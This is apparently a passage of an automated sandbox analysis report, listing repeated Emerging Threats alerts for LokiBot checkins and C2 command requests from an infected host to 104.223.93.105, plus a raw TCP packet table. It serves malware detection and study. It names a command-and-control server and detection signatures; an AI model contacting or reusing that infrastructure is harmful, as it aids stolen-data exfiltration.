                    01/14/22-07:15:44.685174TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.4104.223.93.105
                    01/14/22-07:15:44.685174TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.4104.223.93.105
                    01/14/22-07:15:46.279601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.4104.223.93.105
                    01/14/22-07:15:48.680703TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.4104.223.93.105
                    01/14/22-07:15:51.278646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.4104.223.93.105
                    01/14/22-07:15:52.910922TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.4104.223.93.105
                    01/14/22-07:15:54.384953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.4104.223.93.105
                    01/14/22-07:15:56.404035TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.4104.223.93.105
                    01/14/22-07:15:58.873327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.4104.223.93.105
                    01/14/22-07:16:01.632258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.4104.223.93.105
                    01/14/22-07:16:03.275393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.4104.223.93.105
                    01/14/22-07:16:04.521632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.4104.223.93.105
                    01/14/22-07:16:05.921415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.4104.223.93.105
                    01/14/22-07:16:07.332344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.4104.223.93.105
                    01/14/22-07:16:08.825264TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.4104.223.93.105
                    01/14/22-07:16:12.085516TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.4104.223.93.105
                    01/14/22-07:16:14.147581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.4104.223.93.105
                    01/14/22-07:16:17.416397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.4104.223.93.105
                    01/14/22-07:16:20.386728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.4104.223.93.105
                    01/14/22-07:16:24.539317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.4104.223.93.105
                    01/14/22-07:16:28.261721TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.4104.223.93.105
                    01/14/22-07:16:30.749545TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.4104.223.93.105
                    01/14/22-07:16:33.019782TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.4104.223.93.105
                    01/14/22-07:16:34.831558TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.4104.223.93.105
                    01/14/22-07:16:36.784150TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.4104.223.93.105
                    01/14/22-07:16:38.818540TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.4104.223.93.105
                    01/14/22-07:16:40.128747TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.4104.223.93.105
                    01/14/22-07:16:41.470924TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.4104.223.93.105
                    01/14/22-07:16:43.379060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.4104.223.93.105
                    01/14/22-07:16:46.514857TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.4104.223.93.105
                    01/14/22-07:16:49.069116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2025381ET TROJAN LokiBot Checkin4987780192.168.2.4104.223.93.105
                    01/14/22-07:16:51.061157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.4104.223.93.105
                    01/14/22-07:16:53.094091TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.4104.223.93.105
                    01/14/22-07:16:55.310736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.4104.223.93.105
                    01/14/22-07:16:57.010126TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.4104.223.93.105
                    01/14/22-07:16:58.361672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.4104.223.93.105
                    01/14/22-07:16:59.960262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.4104.223.93.105
                    01/14/22-07:17:01.212523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.4104.223.93.105
                    01/14/22-07:17:02.582056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.4104.223.93.105
                    01/14/22-07:17:03.930333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.4104.223.93.105
                    01/14/22-07:17:05.232616TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.4104.223.93.105
                    01/14/22-07:17:06.577783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.4104.223.93.105
                    01/14/22-07:17:07.881860TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.4104.223.93.105
                    01/14/22-07:17:09.745173TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2025381ET TROJAN LokiBot Checkin4989380192.168.2.4104.223.93.105
                    01/14/22-07:17:11.929100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.2.4104.223.93.105

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 07:15:13.939903975 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.064361095 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.064524889 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.068203926 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.192395926 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.192487955 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.320434093 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.326773882 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.327156067 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:14.327296972 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.339560032 CET4976580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:14.464122057 CET8049765104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:15.648782969 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:15.771281004 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:15.771379948 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:15.774785995 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:15.897432089 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:15.897516012 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:16.019885063 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:16.029309988 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:16.029351950 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:16.029422998 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:16.029493093 CET4976680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:16.152523994 CET8049766104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:16.883490086 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.007704020 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:17.007812977 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.010469913 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.134510994 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:17.134681940 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.259054899 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:17.266379118 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:17.266415119 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:17.266628981 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.266683102 CET4976780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:17.390873909 CET8049767104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.262489080 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.386570930 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.386708975 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.393620968 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.518122911 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.518191099 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.642317057 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.650015116 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.650059938 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:18.650125027 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.650209904 CET4976880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:18.774828911 CET8049768104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:19.537019014 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:19.691287994 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:19.692826033 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:19.695573092 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:19.846610069 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:19.846723080 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:20.007998943 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:20.016736984 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:20.016784906 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:20.016962051 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:20.017034054 CET4976980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:20.141881943 CET8049769104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.196603060 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.319559097 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.319654942 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.323362112 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.445976973 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.446059942 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.569977999 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.577928066 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.578051090 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.578094006 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:21.578141928 CET4977080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:21.728550911 CET8049770104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.232184887 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.356343985 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.356417894 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.359164000 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.483490944 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.483581066 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.607997894 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.616121054 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.616225004 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:24.616311073 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.616329908 CET4977180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:24.740901947 CET8049771104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:25.662341118 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:25.805389881 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:25.805676937 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:25.808697939 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:25.954987049 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:25.955164909 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:26.107965946 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:26.114744902 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:26.114762068 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:26.114911079 CET4977280192.168.2.4104.223.93.105
